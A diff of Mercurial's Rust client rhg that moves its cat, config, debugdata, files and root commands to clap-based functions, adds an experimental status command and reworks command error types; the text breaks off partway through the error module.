-/// Normalize the interface of the commands provided by rhg -pub trait Command { - fn run(&self, ui: &Ui) -> Result<(), CommandError>; -} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,9 +1,7 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; -use crate::ui::Ui; -use hg::operations::{cat, CatRevError, CatRevErrorKind}; -use hg::repo::Repo; +use crate::error::CommandError; +use clap::Arg; +use format_bytes::format_bytes; +use hg::operations::cat; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; @@ -12,94 +10,75 @@ Output the current or given revision of files "; -pub struct CatCommand<'a> { - rev: Option<&'a str>, - files: Vec<&'a str>, -} - -impl<'a> CatCommand<'a> { - pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self { - Self { rev, files } - } - - fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> { - ui.write_stdout(data)?; - Ok(()) - } -} - -impl<'a> Command for CatCommand<'a> { - #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - repo.check_requirements()?; - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; - - let mut files = vec![]; - for file in self.files.iter() { - let normalized = cwd.join(&file); - let stripped = normalized - .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandErrorKind::Abort(None)))?; - let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandErrorKind::Abort(None)))?; - files.push(hg_file); - } - - match self.rev { - Some(rev) => { - let data = cat(&repo, rev, &files) - .map_err(|e| map_rev_error(rev, e))?; - self.display(ui, &data) - } - None => Err(CommandErrorKind::Unimplemented.into()), - } - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("cat") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .arg( + clap::Arg::with_name("files") + .required(true) + .multiple(true) + .empty_values(false) + .value_name("FILE") + .help("Activity to start: activity@category"), + ) + .about(HELP_TEXT) } -/// Convert `CatRevErrorKind` to `CommandError` -fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - CommandError { - kind: match err.kind { - CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) +#[timed] +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); + let file_args = match invocation.subcommand_args.values_of("files") { + Some(files) => files.collect(), + None => vec![], + }; + + let repo = invocation.repo?; + let cwd = hg::utils::current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + + let mut files = vec![]; + for file in file_args.iter() { + // TODO: actually normalize `..` path segments etc? + let normalized = cwd.join(&file); + let stripped = normalized + .strip_prefix(&working_directory) + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; + let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) + .map_err(|e| CommandError::abort(e.to_string()))?; + files.push(hg_file); + } + + match rev { + Some(rev) => { + let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + invocation.ui.write_stdout(&output.concatenated)?; + if !output.missing.is_empty() { + let short = format!("{:x}", output.node.short()).into_bytes(); + for path in &output.missing { + invocation.ui.write_stderr(&format_bytes!( + b"{}: no such file in rev {}\n", + path.as_bytes(), + short + ))?; + } } - CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - CatRevErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) + if output.found_any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) } - }, + } + None => Err(CommandError::unsupported( + "`rhg cat` without `--rev` / `-r`", + )), } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/config.rs copy from rust/rhg/src/commands/root.rs copy to rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,29 +1,38 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; +use clap::Arg; use format_bytes::format_bytes; -use hg::repo::Repo; -use hg::utils::files::get_bytes_from_path; +use hg::errors::HgError; +use hg::utils::SliceExt; pub const HELP_TEXT: &str = " -Print the root directory of the current repository. - -Returns 0 on success. +With one argument of the form section.name, print just the value of that config item. "; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("config") + .arg( + Arg::with_name("name") + .help("the section.name to print") + .value_name("NAME") + .required(true) + .takes_value(true), + ) + .about(HELP_TEXT) } -impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let (section, name) = invocation + .subcommand_args + .value_of("name") + .expect("missing required CLI argument") + .as_bytes() + .split_2(b'.') + .ok_or_else(|| HgError::unsupported("hg config <section>"))?; + + if let Some(value) = invocation.config.get(section, name) { + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) + } else { + Err(CommandError::Unsuccessful) } } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,91 +1,65 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; -use crate::ui::Ui; -use hg::operations::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -use hg::repo::Repo; +use crate::error::CommandError; +use clap::Arg; +use clap::ArgGroup; +use hg::operations::{debug_data, DebugDataKind}; use micro_timer::timed; pub const HELP_TEXT: &str = " Dump the contents of a data file revision "; -pub struct DebugDataCommand<'a> { - rev: &'a str, - kind: DebugDataKind, -} - -impl<'a> DebugDataCommand<'a> { - pub fn new(rev: &'a str, kind: DebugDataKind) -> Self { - DebugDataCommand { rev, kind } - } -} - -impl<'a> Command for DebugDataCommand<'a> { - #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| to_command_error(self.rev, e))?; - - let mut stdout = ui.stdout_buffer(); - stdout.write_all(&data)?; - stdout.flush()?; - - Ok(()) - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugdata") + .arg( + Arg::with_name("changelog") + .help("open changelog") + .short("-c") + .long("--changelog"), + ) + .arg( + Arg::with_name("manifest") + .help("open manifest") + .short("-m") + .long("--manifest"), + ) + .group( + ArgGroup::with_name("") + .args(&["changelog", "manifest"]) + .required(true), + ) + .arg( + Arg::with_name("rev") + .help("revision") + .required(true) + .value_name("REV"), + ) + .about(HELP_TEXT) } -/// Convert operation errors to command errors -fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err.kind { - DebugDataErrorKind::IoError(err) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - }, - DebugDataErrorKind::InvalidRevision => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::AmbiguousPrefix => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )), - }, - DebugDataErrorKind::CorruptedRevlog => CommandError { - kind: CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - }, - DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )), - }, - } +#[timed] +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let args = invocation.subcommand_args; + let rev = args + .value_of("rev") + .expect("rev should be a required argument"); + let kind = + match (args.is_present("changelog"), args.is_present("manifest")) { + (true, false) => DebugDataKind::Changelog, + (false, true) => DebugDataKind::Manifest, + (true, true) => { + unreachable!("Should not happen since options are exclusive") + } + (false, false) => { + unreachable!("Should not happen since options are required") + } + }; + + let repo = invocation.repo?; + let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?; + + let mut stdout = invocation.ui.stdout_buffer(); + stdout.write_all(&data)?; + stdout.flush()?; + + Ok(()) } diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,30 +1,22 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; -use hg::repo::Repo; -use hg::requirements; pub const HELP_TEXT: &str = " Print the current repo requirements. "; -pub struct DebugRequirementsCommand {} - -impl DebugRequirementsCommand { - pub fn new() -> Self { - DebugRequirementsCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) } -impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let mut output = String::new(); - for req in requirements::load(&repo)? { - output.push_str(&req); - output.push('\n'); - } - ui.write_stdout(output.as_bytes())?; - Ok(()) +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = invocation.repo?; + let mut output = String::new(); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); + output.push('\n'); } + invocation.ui.write_stdout(output.as_bytes())?; + Ok(()) } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,15 +1,10 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; +use crate::error::CommandError; use crate::ui::Ui; -use hg::operations::{ - list_rev_tracked_files, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -use hg::operations::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +use clap::Arg; +use hg::operations::list_rev_tracked_files; +use hg::operations::Dirstate; use hg::repo::Repo; +use hg::utils::current_dir; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -19,124 +14,78 @@ Returns 0 on success. "; -pub struct FilesCommand<'a> { - rev: Option<&'a str>, +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("files") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .about(HELP_TEXT) } -impl<'a> FilesCommand<'a> { - pub fn new(rev: Option<&'a str>) -> Self { - FilesCommand { rev } +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let relative = invocation.config.get(b"ui", b"relative-paths"); + if relative.is_some() { + return Err(CommandError::unsupported( + "non-default ui.relative-paths", + )); } - fn display_files( - &self, - ui: &Ui, - repo: &Repo, - files: impl IntoIterator<Item = &'a HgPath>, - ) -> Result<(), CommandError> { - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; - let rooted_cwd = cwd - .strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); - - let mut stdout = ui.stdout_buffer(); + let rev = invocation.subcommand_args.value_of("rev"); - for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; - stdout.write_all(b"\n")?; - } - stdout.flush()?; - Ok(()) - } -} - -impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - repo.check_requirements()?; - if let Some(rev) = self.rev { - let files = list_rev_tracked_files(&repo, rev) - .map_err(|e| map_rev_error(rev, e))?; - self.display_files(ui, &repo, files.iter()) - } else { - let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?; - let files = distate.tracked_files().map_err(map_dirstate_error)?; - self.display_files(ui, &repo, files) - } + let repo = invocation.repo?; + if let Some(rev) = rev { + let files = list_rev_tracked_files(repo, rev).map_err(|e| (e, rev))?; + display_files(invocation.ui, repo, files.iter()) + } else { + let distate = Dirstate::new(repo)?; + let files = distate.tracked_files()?; + display_files(invocation.ui, repo, files) } } -/// Convert `ListRevTrackedFilesErrorKind` to `CommandError` -fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListRevTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListRevTrackedFilesErrorKind::InvalidRevision => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::AmbiguousPrefix => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::CorruptedRevlog => { - CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )) - } - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, +fn display_files<'a>( + ui: &Ui, + repo: &Repo, + files: impl IntoIterator<Item = &'a HgPath>, +) -> Result<(), CommandError> { + let mut stdout = ui.stdout_buffer(); + + let cwd = current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + + let mut any = false; + if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) { + // The current directory is inside the repo, so we can work with + // relative paths + let cwd = HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo)); + for file in files { + any = true; + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } else { + let working_directory = + HgPathBuf::from(get_bytes_from_path(working_directory)); + let cwd = HgPathBuf::from(get_bytes_from_path(cwd)); + for file in files { + any = true; + // Absolute path in the filesystem + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } + + stdout.flush()?; + if any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) } } - -/// Convert `ListDirstateTrackedFilesError` to `CommandError` -fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListDirstateTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesErrorKind::ParseError(_) => { - CommandErrorKind::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - }, - } -} diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,8 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; use format_bytes::format_bytes; -use hg::repo::Repo; +use hg::errors::{IoErrorContext, IoResultExt}; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -11,19 +9,20 @@ Returns 0 on success. "; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("root").about(HELP_TEXT) } -impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; - Ok(()) - } +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = invocation.repo?; + let working_directory = repo.working_directory_path(); + let working_directory = std::fs::canonicalize(working_directory) + .with_context(|| { + IoErrorContext::CanonicalizingPath(working_directory.to_owned()) + })?; + let bytes = get_bytes_from_path(&working_directory); + invocation + .ui + .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + Ok(()) } diff --git a/rust/rhg/src/commands/status.rs b/rust/rhg/src/commands/status.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/commands/status.rs @@ -0,0 +1,315 @@ +// status.rs +// +// Copyright 2020, Georges Racinet <georges.racinets@octobus.net> +// +// This software may be used and distributed according to the terms of the +// GNU General Public License version 2 or any later version. + +use crate::error::CommandError; +use crate::ui::Ui; +use clap::{Arg, SubCommand}; +use hg; +use hg::errors::IoResultExt; +use hg::matchers::AlwaysMatcher; +use hg::operations::cat; +use hg::repo::Repo; +use hg::revlog::node::Node; +use hg::utils::hg_path::{hg_path_to_os_string, HgPath}; +use hg::{DirstateMap, StatusError}; +use hg::{HgPathCow, StatusOptions}; +use log::{info, warn}; +use std::convert::TryInto; +use std::fs; +use std::io::BufReader; +use std::io::Read; + +pub const HELP_TEXT: &str = " +Show changed files in the working directory + +This is a pure Rust version of `hg status`. + +Some options might be missing, check the list below. +"; + +pub fn args() -> clap::App<'static, 'static> { + SubCommand::with_name("status") + .alias("st") + .about(HELP_TEXT) + .arg( + Arg::with_name("all") + .help("show status of all files") + .short("-A") + .long("--all"), + ) + .arg( + Arg::with_name("modified") + .help("show only modified files") + .short("-m") + .long("--modified"), + ) + .arg( + Arg::with_name("added") + .help("show only added files") + .short("-a") + .long("--added"), + ) + .arg( + Arg::with_name("removed") + .help("show only removed files") + .short("-r") + .long("--removed"), + ) + .arg( + Arg::with_name("clean") + .help("show only clean files") + .short("-c") + .long("--clean"), + ) + .arg( + Arg::with_name("deleted") + .help("show only deleted files") + .short("-d") + .long("--deleted"), + ) + .arg( + Arg::with_name("unknown") + .help("show only unknown (not tracked) files") + .short("-u") + .long("--unknown"), + ) + .arg( + Arg::with_name("ignored") + .help("show only ignored files") + .short("-i") + .long("--ignored"), + ) +} + +/// Pure data type allowing the caller to specify file states to display +#[derive(Copy, Clone, Debug)] +pub struct DisplayStates { + pub modified: bool, + pub added: bool, + pub removed: bool, + pub clean: bool, + pub deleted: bool, + pub unknown: bool, + pub ignored: bool, +} + +pub const DEFAULT_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: false, + deleted: true, + unknown: true, + ignored: false, +}; + +pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: true, + deleted: true, + unknown: true, + ignored: true, +}; + +impl DisplayStates { + pub fn is_empty(&self) -> bool { + !(self.modified + || self.added + || self.removed + || self.clean + || self.deleted + || self.unknown + || self.ignored) + } +} + +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let status_enabled_default = false; + let status_enabled = invocation.config.get_option(b"rhg", b"status")?; + if !status_enabled.unwrap_or(status_enabled_default) { + return Err(CommandError::unsupported( + "status is experimental in rhg (enable it with 'rhg.status = true' \ + or enable fallback with 'rhg.on-unsupported = fallback')" + )); + } + + let ui = invocation.ui; + let args = invocation.subcommand_args; + let display_states = if args.is_present("all") { + // TODO when implementing `--quiet`: it excludes clean files + // from `--all` + ALL_DISPLAY_STATES + } else { + let requested = DisplayStates { + modified: args.is_present("modified"), + added: args.is_present("added"), + removed: args.is_present("removed"), + clean: args.is_present("clean"), + deleted: args.is_present("deleted"), + unknown: args.is_present("unknown"), + ignored: args.is_present("ignored"), + }; + if requested.is_empty() { + DEFAULT_DISPLAY_STATES + } else { + requested + } + }; + + let repo = invocation.repo?; + let mut dmap = DirstateMap::new(); + let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?; + let parents = dmap.read(&dirstate_data)?; + let options = StatusOptions { + // TODO should be provided by the dirstate parsing and + // hence be stored on dmap. Using a value that assumes we aren't + // below the time resolution granularity of the FS and the + // dirstate. + last_normal_time: 0, + // we're currently supporting file systems with exec flags only + // anyway + check_exec: true, + list_clean: display_states.clean, + list_unknown: display_states.unknown, + list_ignored: display_states.ignored, + collect_traversed_dirs: false, + }; + let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded + let ((lookup, ds_status), pattern_warnings) = hg::status( + &dmap, + &AlwaysMatcher, + repo.working_directory_path().to_owned(), + vec![ignore_file], + options, + )?; + if !pattern_warnings.is_empty() { + warn!("Pattern warnings: {:?}", &pattern_warnings); + } + + if !ds_status.bad.is_empty() { + warn!("Bad matches {:?}", &(ds_status.bad)) + } + if !lookup.is_empty() { + info!( + "Files to be rechecked by retrieval from filelog: {:?}", + &lookup + ); + } + // TODO check ordering to match `hg status` output. + // (this is as in `hg help status`) + if display_states.modified { + display_status_paths(ui, &(ds_status.modified), b"M")?; + } + if !lookup.is_empty() { + let p1: Node = parents + .expect( + "Dirstate with no parents should not list any file to + be rechecked for modifications", + ) + .p1 + .into(); + let p1_hex = format!("{:x}", p1); + let mut rechecked_modified: Vec<HgPathCow> = Vec::new(); + let mut rechecked_clean: Vec<HgPathCow> = Vec::new(); + for to_check in lookup { + if cat_file_is_modified(repo, &to_check, &p1_hex)? { + rechecked_modified.push(to_check); + } else { + rechecked_clean.push(to_check); + } + } + if display_states.modified { + display_status_paths(ui, &rechecked_modified, b"M")?; + } + if display_states.clean { + display_status_paths(ui, &rechecked_clean, b"C")?; + } + } + if display_states.added { + display_status_paths(ui, &(ds_status.added), b"A")?; + } + if display_states.clean { + display_status_paths(ui, &(ds_status.clean), b"C")?; + } + if display_states.removed { + display_status_paths(ui, &(ds_status.removed), b"R")?; + } + if display_states.deleted { + display_status_paths(ui, &(ds_status.deleted), b"!")?; + } + if display_states.unknown { + display_status_paths(ui, &(ds_status.unknown), b"?")?; + } + if display_states.ignored { + display_status_paths(ui, &(ds_status.ignored), b"I")?; + } + Ok(()) +} + +// Probably more elegant to use a Deref or Borrow trait rather than +// harcode HgPathBuf, but probably not really useful at this point +fn display_status_paths( + ui: &Ui, + paths: &[HgPathCow], + status_prefix: &[u8], +) -> Result<(), CommandError> { + for path in paths { + // Same TODO as in commands::root + let bytes: &[u8] = path.as_bytes(); + // TODO optim, probably lots of unneeded copies here, especially + // if out stream is buffered + ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?; + } + Ok(()) +} + +/// Check if a file is modified by comparing actual repo store and file system. +/// +/// This meant to be used for those that the dirstate cannot resolve, due +/// to time resolution limits. +/// +/// TODO: detect permission bits and similar metadata modifications +fn cat_file_is_modified( + repo: &Repo, + hg_path: &HgPath, + rev: &str, +) -> Result<bool, CommandError> { + // TODO CatRev expects &[HgPathBuf], something like + // &[impl Deref<HgPath>] would be nicer and should avoid the copy + let path_bufs = [hg_path.into()]; + // TODO IIUC CatRev returns a simple Vec<u8> for all files + // being able to tell them apart as (path, bytes) would be nicer + // and OPTIM would allow manifest resolution just once. + let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?; + + let fs_path = repo + .working_directory_vfs() + .join(hg_path_to_os_string(hg_path).expect("HgPath conversion")); + let hg_data_len: u64 = match output.concatenated.len().try_into() { + Ok(v) => v, + Err(_) => { + // conversion of data length to u64 failed, + // good luck for any file to have this content + return Ok(true); + } + }; + let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?; + if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len + { + return Ok(true); + } + for (fs_byte, hg_byte) in + BufReader::new(fobj).bytes().zip(output.concatenated) + { + if fs_byte.map_err(|e| StatusError::from(e))? != hg_byte { + return Ok(true); + } + } + Ok(false) +} diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,124 +1,195 @@ use crate::exitcode; +use crate::ui::utf8_to_local; use crate::ui::UiError; +use crate::NoRepoInCwdError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, FindRootErrorKind}; -use hg::requirements::RequirementsError; +use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError}; +use hg::errors::HgError; +use hg::repo::RepoError; +use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; +use hg::{DirstateError, DirstateMapError, StatusError}; use std::convert::From; -use std::path::PathBuf; /// The kind of command error #[derive(Debug)] -pub enum CommandErrorKind { - /// The root of the repository cannot be found - RootNotFound(PathBuf), - /// The current directory cannot be found - CurrentDirNotFound(std::io::Error), - /// `.hg/requires` - RequirementsError(RequirementsError), - /// The standard output stream cannot be written to - StdoutError, - /// The standard error stream cannot be written to - StderrError, - /// The command aborted - Abort(Option<Vec<u8>>), - /// A mercurial capability as not been implemented. - Unimplemented, +pub enum CommandError { + /// Exit with an error message and "standard" failure exit code. + Abort { + message: Vec<u8>, + detailed_exit_code: exitcode::ExitCode, + }, + + /// Exit with a failure exit code but no message. + Unsuccessful, + + /// Encountered something (such as a CLI argument, repository layout, …) + /// not supported by this version of `rhg`. Depending on configuration + /// `rhg` may attempt to silently fall back to Python-based `hg`, which + /// may or may not support this feature. + UnsupportedFeature { message: Vec<u8> }, } -impl CommandErrorKind { - pub fn get_exit_code(&self) -> exitcode::ExitCode { - match self { - CommandErrorKind::RootNotFound(_) => exitcode::ABORT, - CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT, - CommandErrorKind::RequirementsError( - RequirementsError::Unsupported { .. }, - ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandErrorKind::RequirementsError(_) => exitcode::ABORT, - CommandErrorKind::StdoutError => exitcode::ABORT, - CommandErrorKind::StderrError => exitcode::ABORT, - CommandErrorKind::Abort(_) => exitcode::ABORT, - CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, +impl CommandError { + pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::abort_with_exit_code(message, exitcode::ABORT) + } + + pub fn abort_with_exit_code( + message: impl AsRef<str>, + detailed_exit_code: exitcode::ExitCode, + ) -> Self { + CommandError::Abort { + // TODO: bytes-based (instead of Unicode-based) formatting + // of error messages to handle non-UTF-8 filenames etc: + // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output + message: utf8_to_local(message.as_ref()).into(), + detailed_exit_code: detailed_exit_code, } } - /// Return the message corresponding to the error kind if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - match self { - CommandErrorKind::RootNotFound(path) => { - let bytes = get_bytes_from_path(path); - Some(format_bytes!( - b"abort: no repository found in '{}' (.hg not found)!\n", - bytes.as_slice() - )) + pub fn unsupported(message: impl AsRef<str>) -> Self { + CommandError::UnsupportedFeature { + message: utf8_to_local(message.as_ref()).into(), + } + } +} + +/// For now we don’t differenciate between invalid CLI args and valid for `hg` +/// but not supported yet by `rhg`. +impl From<clap::Error> for CommandError { + fn from(error: clap::Error) -> Self { + CommandError::unsupported(error.to_string()) + } +} + +impl From<HgError> for CommandError { + fn from(error: HgError) -> Self { + match error { + HgError::UnsupportedFeature(message) => { + CommandError::unsupported(message) } - CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!( - b"abort: error getting current working directory: {}\n", - e.to_string().as_bytes(), - )), - CommandErrorKind::RequirementsError( - RequirementsError::Corrupted, - ) => Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ), - CommandErrorKind::Abort(message) => message.to_owned(), - _ => None, + _ => CommandError::abort(error.to_string()), } } } -/// The error type for the Command trait -#[derive(Debug)] -pub struct CommandError { - pub kind: CommandErrorKind, -} - -impl CommandError { - /// Exist the process with the corresponding exit code. - pub fn exit(&self) { - std::process::exit(self.kind.get_exit_code()) - } - - /// Return the message corresponding to the command error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - self.kind.get_error_message_bytes() - } -} - -impl From<CommandErrorKind> for CommandError { - fn from(kind: CommandErrorKind) -> Self { - CommandError { kind } +impl From<ConfigValueParseError> for CommandError { + fn from(error: ConfigValueParseError) -> Self { + CommandError::abort_with_exit_code( + error.to_string(), + exitcode::CONFIG_ERROR_ABORT, + ) } } impl From<UiError> for CommandError { - fn from(error: UiError) -> Self { - CommandError { - kind: match error { - UiError::StdoutError(_) => 